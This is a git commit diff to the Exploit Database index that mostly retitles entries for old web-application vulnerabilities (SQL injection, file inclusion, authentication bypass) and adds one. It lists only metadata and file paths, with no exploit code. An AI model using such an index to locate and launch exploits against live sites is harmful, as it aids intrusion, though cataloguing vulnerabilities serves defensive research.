DB: 2017-01-04

1 new exploits

Nitrotech 0.0.3a - (includes/common.php) Remote Code Execution
Nitrotech 0.0.3a - Remote Code Execution

Basic-CMS - 'index.php' SQL Injection
Basic-CMS - SQL Injection
Simple Customer 1.2 - (Authentication Bypass) SQL Injection
SaturnCMS - (view) Blind SQL Injection
Simple Customer 1.2 - Authentication Bypass
SaturnCMS - Blind SQL Injection

Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion
Free Directory Script 1.1.1 - 'API_HOME_DIR' Parameter Remote File Inclusion

MyTopix 1.3.0 - (notes send) SQL Injection
MyTopix 1.3.0 - SQL Injection

RevSense - (Authentication Bypass) SQL Injection
RevSense 1.0 - Authentication Bypass

AskPert - (Authentication Bypass) SQL Injection
AskPert - Authentication Bypass

Natterchat 1.1 - (Authentication Bypass) SQL Injection
Natterchat 1.1 - Authentication Bypass
Natterchat 1.12 - (Authentication Bypass) SQL Injection
ToursManager - 'tourview.php tourid' Blind SQL Injection
Natterchat 1.12 - Authentication Bypass
ToursManager - 'tourview.php' Blind SQL Injection
VCalendar - 'VCalendar.mdb' Remote Database Disclosure
Joomla! Component Thyme 1.0 - (event) SQL Injection
e107 Plugin ZoGo-Shop 1.15.4 - (product) SQL Injection
VCalendar - Remote Database Disclosure
Joomla! Component Thyme 1.0 - SQL Injection
e107 Plugin ZoGo-Shop 1.15.4 - 'product' Parameter SQL Injection

Vlog System 1.1 - (blog.php user) SQL Injection
Vlog System 1.1 - SQL Injection
Netartmedia Cars Portal 2.0 - (image.php id) SQL Injection
Netartmedia Blog System - 'image.php id' SQL Injection
PG Real Estate - (Authentication Bypass) SQL Injection
Pilot Group PG Roommate Finder Solution - (Authentication Bypass) SQL Injection
PG Job Site - (poll_view_id) Blind SQL Injection
Netartmedia Cars Portal 2.0 - SQL Injection
Netartmedia Blog System - SQL Injection
PG Real Estate - Authentication Bypass
Pilot Group PG Roommate Finder Solution - Authentication Bypass
PG Job Site - Blind SQL Injection
bandwebsite 1.5 - SQL Injection / Cross-Site Scripting
WebStudio CMS - 'index.php pageid' Blind SQL Injection
Bandwebsite 1.5 - SQL Injection / Cross-Site Scripting
WebStudio CMS - Blind SQL Injection

nitrotech 0.0.3a - Remote File Inclusion / SQL Injection
Nitrotech 0.0.3a - Remote File Inclusion / SQL Injection
WebStudio eHotel - (pageid) Blind SQL Injection
WebStudio eCatalogue - (pageid) Blind SQL Injection
FAQ Manager 1.2 - (categorie.php cat_id) SQL Injection
WebStudio eHotel - Blind SQL Injection
WebStudio eCatalogue - Blind SQL Injection
FAQ Manager 1.2 - 'categorie.php' SQL Injection
FAQ Manager 1.2 - (config_path) Remote File Inclusion
Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection
FAQ Manager 1.2 - 'header.php' Remote File Inclusion
Clean CMS 1.5 - Blind SQL Injection

SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure
SimpleBlog 3.0 - Database Disclosure
VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection
Jamit Job Board 3.x - (show_emp) Blind SQL Injection
WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)
VideoGirls BiZ - Blind SQL Injection
Jamit Job Board 3.x - Blind SQL Injection
My Click Counter 1.0 - Authentication Bypass

ParsBlogger - 'blog.asp wr' SQL Injection
ParsBlogger - 'blog.asp' SQL Injection

TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion
TxtBlog 1.0 Alpha - Local File Inclusion
Family Project 2.x - (Authentication Bypass) SQL Injection
RakhiSoftware Shopping Cart - (subcategory_id) SQL Injection
Family Project 2.x - Authentication Bypass
RakhiSoftware Shopping Cart - SQL Injection

Ocean12 Membership Manager Pro - (Authentication Bypass) SQL Injection
Ocean12 Membership Manager Pro - Authentication Bypass

Turnkey Arcade Script - 'id' SQL Injection (1)
Turnkey Arcade Script - SQL Injection (1)
Basic-CMS - 'index.php id' Blind SQL Injection
Booking Centre 2.01 - (Authentication Bypass) SQL Injection
Basic-CMS - Blind SQL Injection
Booking Centre 2.01 - Authentication Bypass

Natterchat 1.12 - (Natterchat112.mdb) Database Disclosure
Natterchat 1.12 - Database Disclosure

VIDEOSCRIPT.us - (Authentication Bypass) SQL Injection
VIDEOSCRIPT.us - Authentication Bypass

Turnkey Arcade Script - 'id' SQL Injection (2)
Turnkey Arcade Script - SQL Injection (2)

WEB Calendar - Remote Database Disclosure
Web Calendar - Remote Database Disclosure

Crossday Discuz! 2.0/3.0 - Cross-Site Scripting
Discuz! 2.0/3.0 - Cross-Site Scripting

8Pixel.net SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities
SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities
This commit is contained in:
Offensive Security 2017-01-04 05:01:17 +00:00
parent bac881f89a
commit c512deac7f
3 changed files with 58 additions and 78 deletions

View file

@ -16877,7 +16877,7 @@ id,file,description,date,author,platform,type,port
2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion",2006-10-30,K-159,php,webapps,0
2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0
2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0
2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - (includes/common.php) Remote Code Execution",2006-10-30,Kacper,php,webapps,0
2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - Remote Code Execution",2006-10-30,Kacper,php,webapps,0
2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - File Inclusion",2006-10-30,Kacper,php,webapps,0
2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass (SQL Injection)",2006-10-30,ajann,php,webapps,0
2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion",2006-10-30,v1per-haCker,php,webapps,0
@ -18989,7 +18989,7 @@ id,file,description,date,author,platform,type,port
5833,platforms/php/webapps/5833.txt,"Joomla! Component Simple Shop Galore 3.x - 'catid' Parameter SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0
5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - 'Id' Parameter SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
5836,platforms/php/webapps/5836.txt,"Basic-CMS - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
5836,platforms/php/webapps/5836.txt,"Basic-CMS - SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - 'tid' Parameter SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0
5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - 'id' Parameter SQL Injection",2008-06-17,anonymous,php,webapps,0
@ -20001,47 +20001,47 @@ id,file,description,date,author,platform,type,port
7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Cross-Site Scripting / SQL Injection",2008-11-17,Bl@ckbe@rD,asp,webapps,0
7143,platforms/php/webapps/7143.txt,"PHPfan 3.3.4 - 'init.php' Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0
7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0
7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Authentication Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0
7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - Authentication Bypass",2008-11-17,d3b4g,php,webapps,0
7147,platforms/php/webapps/7147.txt,"SaturnCMS - Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection",2008-11-17,eek,php,webapps,0
7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0
7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Parameter Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0
7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - 'API_HOME_DIR' Parameter Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0
7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0
7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Arbitrary File Upload",2008-11-19,Batter,php,webapps,0
7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - 'FCKeditor' Arbitrary File Upload",2008-11-19,Batter,php,webapps,0
7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple Local File Inclusion",2008-11-19,StAkeR,php,webapps,0
7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - (notes send) SQL Injection",2008-11-19,cOndemned,php,webapps,0
7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - SQL Injection",2008-11-19,cOndemned,php,webapps,0
7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps,0
7163,platforms/php/webapps/7163.txt,"RevSense - (Authentication Bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0
7163,platforms/php/webapps/7163.txt,"RevSense 1.0 - Authentication Bypass",2008-11-19,d3b4g,php,webapps,0
7164,platforms/php/webapps/7164.txt,"Pre Job Board - Authentication Bypass",2008-11-19,R3d-D3V!L,php,webapps,0
7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,php,webapps,0
7166,platforms/php/webapps/7166.txt,"AskPert - (Authentication Bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0
7166,platforms/php/webapps/7166.txt,"AskPert - Authentication Bypass",2008-11-19,TR-ShaRk,php,webapps,0
7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps,0
7170,platforms/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing Exploit",2008-11-20,G4N0K,php,webapps,0
7172,platforms/php/webapps/7172.txt,"Natterchat 1.1 - (Authentication Bypass) SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0
7172,platforms/php/webapps/7172.txt,"Natterchat 1.1 - Authentication Bypass",2008-11-20,Bl@ckbe@rD,php,webapps,0
7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 - 'messages.php' SQL Injection",2008-11-20,irk4z,php,webapps,0
7174,platforms/php/webapps/7174.txt,"vBulletin 3.7.3 - Visitor Message Cross-Site Request Forgery / Worm Exploit",2008-11-20,Mx,php,webapps,0
7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - (Authentication Bypass) SQL Injection",2008-11-20,Stack,php,webapps,0
7176,platforms/php/webapps/7176.txt,"ToursManager - 'tourview.php tourid' Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0
7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - Authentication Bypass",2008-11-20,Stack,php,webapps,0
7176,platforms/php/webapps/7176.txt,"ToursManager - 'tourview.php' Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0
7179,platforms/php/webapps/7179.txt,"Natterchat 1.1 - Remote Authentication Bypass",2008-11-20,Stack,php,webapps,0
7180,platforms/php/webapps/7180.txt,"VCalendar - 'VCalendar.mdb' Remote Database Disclosure",2008-11-20,Swan,php,webapps,0
7182,platforms/php/webapps/7182.txt,"Joomla! Component Thyme 1.0 - (event) SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0
7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - (product) SQL Injection",2008-11-22,NoGe,php,webapps,0
7180,platforms/php/webapps/7180.txt,"VCalendar - Remote Database Disclosure",2008-11-20,Swan,php,webapps,0
7182,platforms/php/webapps/7182.txt,"Joomla! Component Thyme 1.0 - SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0
7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' Parameter SQL Injection",2008-11-22,NoGe,php,webapps,0
7185,platforms/php/webapps/7185.php,"Discuz! - Remote Reset User Password Exploit",2008-11-22,80vul,php,webapps,0
7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - (blog.php user) SQL Injection",2008-11-22,Mr.SQL,php,webapps,0
7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - SQL Injection",2008-11-22,Mr.SQL,php,webapps,0
7188,platforms/php/webapps/7188.txt,"getaphpsite Real Estate - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0
7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0
7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0
7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password",2008-11-22,cOndemned,php,webapps,0
7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' Parameter SQL Injection",2008-11-23,snakespc,php,webapps,0
7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Arbitrary File Upload",2008-11-23,x0r,php,webapps,0
7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0
7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - 'image.php id' SQL Injection",2008-11-23,snakespc,php,webapps,0
7200,platforms/php/webapps/7200.txt,"PG Real Estate - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0
7201,platforms/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0
7202,platforms/php/webapps/7202.txt,"PG Job Site - (poll_view_id) Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0
7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - SQL Injection",2008-11-23,snakespc,php,webapps,0
7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - SQL Injection",2008-11-23,snakespc,php,webapps,0
7200,platforms/php/webapps/7200.txt,"PG Real Estate - Authentication Bypass",2008-11-23,ZoRLu,php,webapps,0
7201,platforms/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - Authentication Bypass",2008-11-23,ZoRLu,php,webapps,0
7202,platforms/php/webapps/7202.txt,"PG Job Site - Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0
7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0
7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0
7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0
@ -20050,49 +20050,49 @@ id,file,description,date,author,platform,type,port
7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0
7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection",2008-11-24,G4N0K,php,webapps,0
7214,platforms/php/webapps/7214.txt,"ftpzik - Cross-Site Scripting / Local File Inclusion",2008-11-24,JIKO,php,webapps,0
7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps,0
7216,platforms/php/webapps/7216.txt,"WebStudio CMS - 'index.php pageid' Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0
7215,platforms/php/webapps/7215.txt,"Bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps,0
7216,platforms/php/webapps/7216.txt,"WebStudio CMS - Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0
7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution",2008-11-24,girex,php,webapps,0
7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps,0
7218,platforms/php/webapps/7218.txt,"Nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps,0
7221,platforms/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusion",2008-11-24,NoGe,php,webapps,0
7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - (categorie.php cat_id) SQL Injection",2008-11-25,cOndemned,php,webapps,0
7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - 'categorie.php' SQL Injection",2008-11-25,cOndemned,php,webapps,0
7225,platforms/php/webapps/7225.txt,"Pie Web m{a_e}sher mod rss 0.1 - Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
7227,platforms/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0
7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0
7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection",2008-11-25,JosS,php,webapps,0
7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - 'header.php' Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - Blind SQL Injection",2008-11-25,JosS,php,webapps,0
7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0
7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0
7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0
7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - Arbitrary File Upload",2008-11-25,cOndemned,php,webapps,0
7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0
7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0
7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0
7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0
7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0
40987,platforms/php/webapps/40987.txt,"My Click Counter 1.0 - Authentication Bypass",2017-01-03,Adam,php,webapps,0
7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0
7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0
7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0
7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0
7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0
7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
7242,platforms/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0
7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Blind SQL Injection (2)",2008-11-27,Stack,php,webapps,0
7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure",2008-11-27,Pouya_Server,php,webapps,0
7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
7246,platforms/php/webapps/7246.txt,"Ocean12 Poll Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
7247,platforms/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
7248,platforms/php/webapps/7248.txt,"Family Project 2.x - (Authentication Bypass) SQL Injection",2008-11-27,The_5p3ctrum,php,webapps,0
7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - (subcategory_id) SQL Injection",2008-11-27,XaDoS,php,webapps,0
7248,platforms/php/webapps/7248.txt,"Family Project 2.x - Authentication Bypass",2008-11-27,The_5p3ctrum,php,webapps,0
7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - SQL Injection",2008-11-27,XaDoS,php,webapps,0
7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Arbitrary File Upload",2008-11-27,ZoRLu,php,webapps,0
7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0
7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0
7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0
7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0
7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0
7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - 'id' SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0
7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0
7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro - Database Disclosure",2008-11-27,Stack,php,webapps,0
7259,platforms/asp/webapps/7259.txt,"Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting",2008-11-27,Bl@ckbe@rD,asp,webapps,0
7260,platforms/php/webapps/7260.txt,"Basic-CMS - 'acm2000.mdb' Remote Database Disclosure",2008-11-28,Stack,php,webapps,0
7261,platforms/php/webapps/7261.txt,"Basic-CMS - 'index.php id' Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Authentication Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0
7261,platforms/php/webapps/7261.txt,"Basic-CMS - Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - Authentication Bypass",2008-11-28,MrDoug,php,webapps,0
7265,platforms/php/webapps/7265.txt,"Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection",2008-11-28,Bl@ckbe@rD,php,webapps,0
7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0
7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0
@ -20181,7 +20181,7 @@ id,file,description,date,author,platform,type,port
7367,platforms/php/webapps/7367.php,"PayPal eStore - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0
7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b - (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0
7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload / Local File Inclusion",2008-12-07,DNX,php,webapps,0
7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - (Natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0
7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0
7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
7372,platforms/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
7373,platforms/asp/webapps/7373.txt,"aspmanage banners - Arbitrary File Upload / File Disclosure",2008-12-07,ZoRLu,asp,webapps,0
@ -20956,7 +20956,7 @@ id,file,description,date,author,platform,type,port
8622,platforms/php/webapps/8622.pl,"webSPELL 4.2.0e - (page) Blind SQL Injection",2009-05-07,DNX,php,webapps,0
8626,platforms/php/webapps/8626.txt,"TCPDB 3.8 - Arbitrary Add Admin Account",2009-05-07,Mr.tro0oqy,php,webapps,0
8627,platforms/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 - Insecure Cookie Handling",2009-05-07,TiGeR-Dz,asp,webapps,0
8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - (Authentication Bypass) SQL Injection",2009-05-07,snakespc,php,webapps,0
8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - Authentication Bypass",2009-05-07,snakespc,php,webapps,0
8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,php,webapps,0
8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,php,webapps,0
8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,php,webapps,0
@ -21504,7 +21504,7 @@ id,file,description,date,author,platform,type,port
9504,platforms/php/webapps/9504.txt,"Joomla! Component com_jtips 1.0.x - (season) Blind SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0
9505,platforms/php/webapps/9505.txt,"Geeklog 1.6.0sr1 - Arbitrary File Upload",2009-08-24,JaL0h,php,webapps,0
9510,platforms/php/webapps/9510.txt,"Joomla! Component com_siirler 1.2 - 'sid' SQL Injection",2009-08-25,v3n0m,php,webapps,0
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - 'id' SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0
9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,php,webapps,0
40383,platforms/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80
9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0
@ -22107,7 +22107,7 @@ id,file,description,date,author,platform,type,port
10790,platforms/php/webapps/10790.txt,"Joomla! Component com_kkcontent - Blind SQL Injection",2009-12-29,Pyske,php,webapps,0
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - (admin) Local File Inclusion",2009-12-30,cr4wl3r,php,webapps,0
10794,platforms/asp/webapps/10794.txt,"WEB Calendar - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
